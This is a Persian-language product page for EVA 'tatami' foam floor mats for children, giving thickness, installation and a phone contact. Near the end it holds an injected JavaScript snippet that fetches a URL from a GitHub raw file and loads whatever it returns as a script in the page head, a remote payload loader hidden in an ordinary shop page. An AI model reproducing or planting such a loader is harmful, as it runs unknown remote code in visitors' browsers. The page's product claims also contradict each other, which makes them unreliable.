کفپوش های تاتمی

  • کفپوش های تاتمی از جنس EVA یک گزینه کاربردی و سرگرم کننده برای مهدکودک ها و اتاق کودکان به حساب می آید. هر قطعه از این کفپوش ها می تواند در دو حالت تک رنگ یا دو رنگ موجود باشد. قطعه های دو رنگ به این صورت است که با برگرداندن آن قطعه می توان رنگ بندی را تغییر داد. ضخامت رایج برای کفپوش کودک 20 میل و 25 میل است که این ضخامت کاربرد امنیتی را به طور کامل برای اتاق کودک فراهم می کند و نیازی به استفاده از ضخامت های بالاتر نیست. نصب و قرار دادن آنها بسیار راحت است و نیلز به مهارتی خاصی ندارد. شما می توانید آنها را به سادگی در جای خود قرار دهید و به صورت نیاز قطعات را حذف و یا جا به جا کنید

    کفپوش های تاتمی

    این کفپوش ها بیشتر برای مهد کودک ها و خانه بازی های استفداه می کنند. این کفپوش ها برای اتاق کودک خوب نیست به دلیل اینکه این کفپوش ها داری رنگ های متفاوتی هستند که بد از مدت زیادی استفاده از ان چشم کودک شما را اذیت و حساس می کند.

    اشتباه نکنید این تاتمی ها برای بازی کردن کودکان مناسب نیست بلکه این تاتمی ها در اصل برای جلو گیری از ضربه است که کودکان هنگام بازی کردن بری روری سرسره های فلزی آسیب نبینند.

    شما میتوانید برای کودکان خود از تاتمی های به شکل حروف انگلیسی ، اعداد ، اشکال هندسی و … پازل که در ابعاد 2CM * 2CM استفاده کنید که به یادیگری اعداد و تقویت حافظه کودک شما کمک میکند.

    نحوه خرید انواع تاتمی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید انواع کفپوش های تاتمی به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید